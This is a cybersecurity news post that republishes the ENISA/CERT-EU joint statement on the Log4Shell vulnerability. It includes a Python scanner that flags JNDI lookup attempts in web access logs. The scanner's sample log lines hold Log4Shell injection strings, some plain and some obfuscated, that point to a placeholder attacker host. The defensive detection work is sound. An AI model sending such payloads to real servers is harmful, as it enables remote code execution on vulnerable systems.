Fri. Jan 28th, 2022

    Content Assessment: Assessment and Advice - ENISA Update on Log4j Vulnerability

    Information - 89%
    Insight - 88%
    Relevance - 92%
    Objectivity - 91%
    Authority - 95%

    91%

    Excellent

    A short percentage-based assessment of the qualitative benefit of the recently published ENISA update on the Log4j vulnerability.

    Editor’s Note: On December 9th, information about a critical unauthenticated Remote Code Execution (RCE) vulnerability (CVE-2021-44228) affecting the well-known Java logging package Log4j, which is used by many popular applications and web services, was tweeted along with a proof-of-concept (PoC) posted on GitHub. This vulnerability could give an attacker full control of the affected server if a user-controlled string is logged. Since it is easy to exploit, the impact of this vulnerability is quite severe. This ENISA overview and updated CERT-EU security advisory may be beneficial for cybersecurity, information governance, and legal discovery professionals in the eDiscovery ecosystem facing the challenge of this vulnerability.
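    As an added example (not part of the ComplexDiscovery post or of the ENISA/CERT-EU advisory), the following Python scanner flags access-log lines carrying a Log4j JNDI lookup after undoing the URL encoding and nested-lookup tricks that defeat a plain search for `${jndi:`; the log lines and the host `attacker.invalid` are constructed for the demonstration.

```python
import re
from urllib.parse import unquote

# Constructed web-server access log lines for this demonstration; the host
# attacker.invalid is a placeholder, not a real indicator.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:11:02:13 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:11:02:19 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:11:02:25 +0000] "GET /?q=${${lower:j}ndi:rmi://attacker.invalid/b} HTTP/1.1" 400 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [10/Dec/2021:11:02:31 +0000] "GET /login HTTP/1.1" 200 1024 "-" "%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2Fattacker.invalid%2Fc%7D"',
]

# An innermost ${...} lookup (body has no further "$", "{" or "}") and the final JNDI form.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def _resolve_obfuscation(body: str):
    # Return the literal an obfuscating Log4j lookup resolves to, or None if it is not one.
    head = body.lower()
    if head.startswith("lower:"):
        return body[6:].lower()
    if head.startswith("upper:"):
        return body[6:].upper()
    # ${key:-default} yields the default when key is unset; ${::-x} is the empty-key
    # form. Treating any ":-" body as that pattern is a deliberate detection heuristic.
    if ":-" in body:
        return body.split(":-", 1)[1]
    return None

def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """URL-decode, then collapse nested obfuscating lookups from the inside out."""
    text = unquote(text)
    for _ in range(max_rounds):
        replaced = False
        def _sub(match):
            nonlocal replaced
            value = _resolve_obfuscation(match.group(1))
            if value is None:
                return match.group(0)
            replaced = True
            return value
        text = _INNER_LOOKUP.sub(_sub, text)
        if not replaced:
            break
    return text

def is_log4shell_attempt(line: str) -> bool:
    # True if the normalized line still carries a JNDI lookup.
    return _JNDI_LOOKUP.search(normalize_lookups(line)) is not None

def scan_log(lines):
    # (line_number, normalized_line) for each line flagged as a Log4Shell attempt.
    return [(n, normalize_lookups(l)) for n, l in enumerate(lines, 1) if is_log4shell_attempt(l)]
```

    Running `scan_log(SAMPLE_LOG_LINES)` flags lines 2, 3 and 4; the normalized form it returns is what an analyst should record, since the raw line may not contain the string `${jndi:` at all.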


    Media Announcement from ENISA and Report from CERT-EU*

    Joint Statement on Log4Shell

    The European Commission, the EU Agency for Cybersecurity, CERT-EU, and the network of the EU national computer security incident response teams (CSIRTs network) have been closely following the development of the Log4Shell vulnerability since 10 December 2021.

    Log4Shell is a vulnerability in the well-known open-source Java logging package Log4j, which is maintained by the Apache Software Foundation. Log4j is used in a wide array of applications and web services across the globe. Due to the nature of the vulnerability, its ubiquity, and the complexity of patching in some of the impacted environments, it is important that all organizations, especially entities who fall under the Network and Information Security (NIS) Directive, assess their potential exposure as soon as possible.

    The CSIRTs Network members are continuously updating a list of vulnerable software, which is maintained by the Dutch National Cyber Security Centre. It is important that adequate mitigation measures are applied in a timely manner and that organizations follow the guidance of their national cybersecurity authorities. The latest advisories published by the CSIRTs Network Members can be found in their relevant official communication channels. Organizations may also refer to guidance given by CERT-EU.

    As this is a developing situation, we strongly recommend all organizations to regularly check the guidance provided by the CSIRTs Network Members and CERT-EU for the latest assessment and advice and to take actions as needed.

    The Agency and all relevant EU actors will continue to monitor this threat to contribute to the overall situational awareness at the Union level.

    For technical background information about the vulnerability and recommendations: Security Advisory 2021-067 – CERT-EU

    For guidance on response please refer to the relevant national authority: CSIRTs by Country – Interactive Map — ENISA

    The latest advisories published by CSIRTs Network Members are available here: https://github.com/enisaeu/CNW/blob/main/advisories.md

    Read the original update.


    Read the Complete Security Advisory: Java Logging Package RCE Vulnerability (PDF)

    CERT-EU-SA2021-067

    See the original security alert.

    *Shared with permission under Creative Commons – Attribution 4.0 International (CC BY 4.0) – license.


    Source: ComplexDiscovery

     
